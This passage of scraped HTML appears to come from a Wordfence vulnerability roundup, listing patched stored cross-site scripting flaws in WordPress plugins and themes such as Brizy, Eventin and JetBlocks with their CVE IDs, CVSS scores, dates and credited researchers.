				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bold-page-builder" target="_blank" rel="noopener">Bold Page Builder</a> <span class="wfvr-software-slug">[bold-page-builder]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suyoung-kim" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/fd81b18fe6c92416befa120a66189f65.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="fd81b18fe6c92416befa120a66189f65"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/suyoung-kim" target="_blank" rel="noopener">suyoung kim(AhnLab)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/629fee36-1fea-4a4d-acc2-9ba18d0b6487" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0edbb65e-d80c-47b6-875a-7b0d6bec9554" target="_blank" rel="noopener">Bridge &#8211; Creative Multipurpose WordPress Theme &lt;= 30.8.9.1 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;circle_line&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15609" target="_blank" rel="noopener noreferrer">							CVE-2026-15609						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-themes/bridge" target="_blank" rel="noopener">Bridge &#8211; Creative Multipurpose WordPress Theme</a> <span class="wfvr-software-slug">[bridge]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-soares-de-alcantara" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/585bd77d4bbe100a43b04223fd09a74f.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="585bd77d4bbe100a43b04223fd09a74f"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/joao-pedro-soares-de-alcantara" target="_blank" rel="noopener">João Pedro Soares de Alcântara</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/0edbb65e-d80c-47b6-875a-7b0d6bec9554" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/89e0babf-780c-467b-b1df-62b5b9403c8f" target="_blank" rel="noopener">Brizy – Page Builder &lt;= 2.8.14 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;rootAttributes&#8217; Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-2585" target="_blank" rel="noopener noreferrer">							CVE-2026-2585						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/brizy" target="_blank" rel="noopener">Brizy – Page Builder</a> <span class="wfvr-software-slug">[brizy]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researchers</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/c0d3936ce2491c1bd33db966cf5421b9.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="c0d3936ce2491c1bd33db966cf5421b9"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/athiwat-tiprasaharn" target="_blank" rel="noopener">Athiwat Tiprasaharn (Jitlada)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/048e7871de77533583773e0172b337bc.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="048e7871de77533583773e0172b337bc"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/itthidej-aramsri" target="_blank" rel="noopener">Itthidej Aramsri (Boeing777)</a></div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tharadol-suksamran" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/cd4a85e790b6360849ccaf9de39d1ad4.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="cd4a85e790b6360849ccaf9de39d1ad4"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/tharadol-suksamran" target="_blank" rel="noopener">Tharadol Suksamran (d3kc4rt_1)</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/89e0babf-780c-467b-b1df-62b5b9403c8f" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b1a9d042-c0c0-477a-8cdf-9fb9d2239059" target="_blank" rel="noopener">Custom Twitter Feeds &lt;= 2.8.0 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;buttoncolor&#8217; Shortcode Attribute</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-84909" target="_blank" rel="noopener noreferrer">							CVE-2026-84909						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/custom-twitter-feeds" target="_blank" rel="noopener">Custom Twitter Feeds – A Tweets Widget or X Feed Widget</a> <span class="wfvr-software-slug">[custom-twitter-feeds]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/b1a9d042-c0c0-477a-8cdf-9fb9d2239059" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/86f798f5-77ed-408b-a0f2-91ea3061fd74" target="_blank" rel="noopener">Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons &lt;= 8.8.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66574" target="_blank" rel="noopener noreferrer">							CVE-2026-66574						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/bdthemes-element-pack-lite" target="_blank" rel="noopener">Element Pack Addons for Elementor – Elementor Widgets, Elementor Templates, Elementor Addons</a> <span class="wfvr-software-slug">[bdthemes-element-pack-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dthangws" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/29bd5dd110d9d483d533b011e29522de.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="29bd5dd110d9d483d533b011e29522de"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/dthangws" target="_blank" rel="noopener">Dthangws</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/86f798f5-77ed-408b-a0f2-91ea3061fd74" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a07070b6-37d2-4ccf-ae81-a08ac7b76241" target="_blank" rel="noopener">Eventin &lt;= 4.1.23 &#8211; Authenticated (Custom+) Stored Cross-Site Scripting via &#8216;etn_shedule_objective&#8217; schedule_slot Parameter</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-15402" target="_blank" rel="noopener noreferrer">							CVE-2026-15402						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-event-solution" target="_blank" rel="noopener">Eventin – Events Calendar, Tickets, Registration, Booking &amp; WooCommerce</a> <span class="wfvr-software-slug">[wp-event-solution]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/b0bd54077fbac807142b902c61d6430c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="b0bd54077fbac807142b902c61d6430c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/prism" target="_blank" rel="noopener">Wordfence PRISM</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a07070b6-37d2-4ccf-ae81-a08ac7b76241" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/862ce9f6-db1d-4d3c-8c0e-e3177173d3c7" target="_blank" rel="noopener">EWWW Image Optimizer &lt;= 8.7.6 &#8211; Authenticated (Author+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-91011" target="_blank" rel="noopener noreferrer">							CVE-2026-91011						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ewww-image-optimizer" target="_blank" rel="noopener">EWWW Image Optimizer</a> <span class="wfvr-software-slug">[ewww-image-optimizer]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/66ac278d7e3fc457bdbe731edc3c5364.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="66ac278d7e3fc457bdbe731edc3c5364"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/artus-kg" target="_blank" rel="noopener">Artus KG</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/862ce9f6-db1d-4d3c-8c0e-e3177173d3c7" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/828b3644-5ff8-4f9a-9592-b0bae40cbaa6" target="_blank" rel="noopener">Geo Mashup &lt;= 1.13.21 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-78294" target="_blank" rel="noopener noreferrer">							CVE-2026-78294						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 16, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/geo-mashup" target="_blank" rel="noopener">Geo Mashup</a> <span class="wfvr-software-slug">[geo-mashup]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/e11f235d878446888d690cc5ba93c3ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="e11f235d878446888d690cc5ba93c3ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/junhee-cho" target="_blank" rel="noopener">JunHee CHO</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/828b3644-5ff8-4f9a-9592-b0bae40cbaa6" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0db9693-df56-44d3-9167-c21e868c3f88" target="_blank" rel="noopener">Getwid &lt;= 2.1.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via Google Maps &#8216;customStyle&#8217;</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-5924" target="_blank" rel="noopener noreferrer">							CVE-2026-5924						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/getwid" target="_blank" rel="noopener">Getwid – Gutenberg Blocks</a> <span class="wfvr-software-slug">[getwid]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jack-pas" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/ee46d8ed5f17142621d8d0c597904ec0.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="ee46d8ed5f17142621d8d0c597904ec0"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/jack-pas" target="_blank" rel="noopener">AlexHenry</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/a0db9693-df56-44d3-9167-c21e868c3f88" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/143c3a66-ac67-48e1-800f-8479fd963da3" target="_blank" rel="noopener">Gum Addon for Elementor &lt;= 1.3.15 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting via &#8216;pop_tag&#8217; Widget Setting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-8354" target="_blank" rel="noopener noreferrer">							CVE-2026-8354						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 18, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/gum-elementor-addon" target="_blank" rel="noopener">Gum Addon for Elementor</a> <span class="wfvr-software-slug">[gum-elementor-addon]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/valatty" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/5326da6569401f522574666ccc1081ba.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="5326da6569401f522574666ccc1081ba"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/valatty" target="_blank" rel="noopener">Valatty</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/143c3a66-ac67-48e1-800f-8479fd963da3" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cf71a67-5b09-4aa6-b244-4d32ee7b312a" target="_blank" rel="noopener">HT Mega 3.2.0 &#8211; 3.2.5 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-86788" target="_blank" rel="noopener noreferrer">							CVE-2026-86788						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 15, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/ht-mega-for-elementor" target="_blank" rel="noopener">HT Mega Addons for Elementor – Elementor Widgets &amp; Template Builder</a> <span class="wfvr-software-slug">[ht-mega-for-elementor]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/8110ca50d15470d1569441aa4f6c445e.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="8110ca50d15470d1569441aa4f6c445e"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/revanth-hari-narayana-matte" target="_blank" rel="noopener">Revanth Hari Narayana Matte</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/2cf71a67-5b09-4aa6-b244-4d32ee7b312a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82f02548-f3a4-490a-8587-66044dcdd15d" target="_blank" rel="noopener">Import Export Lite &lt;= 3.9.32 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-76558" target="_blank" rel="noopener noreferrer">							CVE-2026-76558						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 14, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/wp-import-export-lite" target="_blank" rel="noopener">WP Import Export Lite</a> <span class="wfvr-software-slug">[wp-import-export-lite]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/6a757d7b79b347554dafd0b3534c2218.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="6a757d7b79b347554dafd0b3534c2218"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/mak3bread" target="_blank" rel="noopener">mak3bread</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/82f02548-f3a4-490a-8587-66044dcdd15d" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/59a78686-cc77-435a-b3fc-ab7e8a14173a" target="_blank" rel="noopener">Issues and Series for Newspapers, Magazines, Publishers, Writers &lt;= 3.1.3 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66617" target="_blank" rel="noopener noreferrer">							CVE-2026-66617						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/organize-series" target="_blank" rel="noopener">Issues and Series for Newspapers, Magazines, Publishers, Writers</a> <span class="wfvr-software-slug">[organize-series]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
<div class="mt-1 d-flex align-items-start"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nixxies" target="_blank" rel="noopener"><img decoding="async" src="https://www.gravatar.com/avatar/21afa6c796a1f23334897b28cd162f6c.jpg?s=32&amp;d=mp&amp;r=g" class="wfvr-researcher-gravatar" alt="21afa6c796a1f23334897b28cd162f6c"></a><a href="https://www.wordfence.com/threat-intel/vulnerabilities/researchers/nixxies" target="_blank" rel="noopener">Nixxies</a></div>
</p></div>
</p></div>
</p></div>
</p></div>
<div class="footer">
		<a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/59a78686-cc77-435a-b3fc-ab7e8a14173a" target="_blank" rel="noopener">More Details &gt;</a>
	</div>
</div>
<div class="wfvr-vulnerability cvss-rating-medium">
<div class="header">
<h4><a href="https://www.wordfence.com/threat-intel/vulnerabilities/id/63904d54-1fb4-45f6-ac42-d82fe192cf1b" target="_blank" rel="noopener">JetBlocks for Elementor &lt;= 1.5.2 &#8211; Authenticated (Contributor+) Stored Cross-Site Scripting</a></h4>
<div class="cvss-score-badge">6.4</div>
</p></div>
<div class="content">
<div class="at-a-glance">
<div class="cvss-rating">
					<span>CVSS Rating</span><br />
					<strong>6.4 (Medium)</strong>
				</div>
<div class="cve-id">
					<span>CVE-ID</span><br />
					<strong><br />
						<a href="https://www.cve.org/CVERecord?id=CVE-2026-66576" target="_blank" rel="noopener noreferrer">							CVE-2026-66576						</a>					</strong>
				</div>
<div class="patched-status">
					<span>Patch Status</span><br />
					<strong class="patched"><br />
						Patched					</strong>
				</div>
<div class="published-at">
				<span>Published</span><br />
				<strong>Sep 17, 2026</strong>
			</div>
</p></div>
<div class="row">
<div class="col-12 col-md-7 affected-software mb-2">
				<strong>Affected Software</strong></p>
<div class="wfvr-software-item"><a href="https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/jet-blocks" target="_blank" rel="noopener">JetBlocks for Elementor</a> <span class="wfvr-software-slug">[jet-blocks]</span></div>
</p></div>
<div class="col-12 col-md-5 researchers">
														<strong>Researcher</strong></p>
<div>
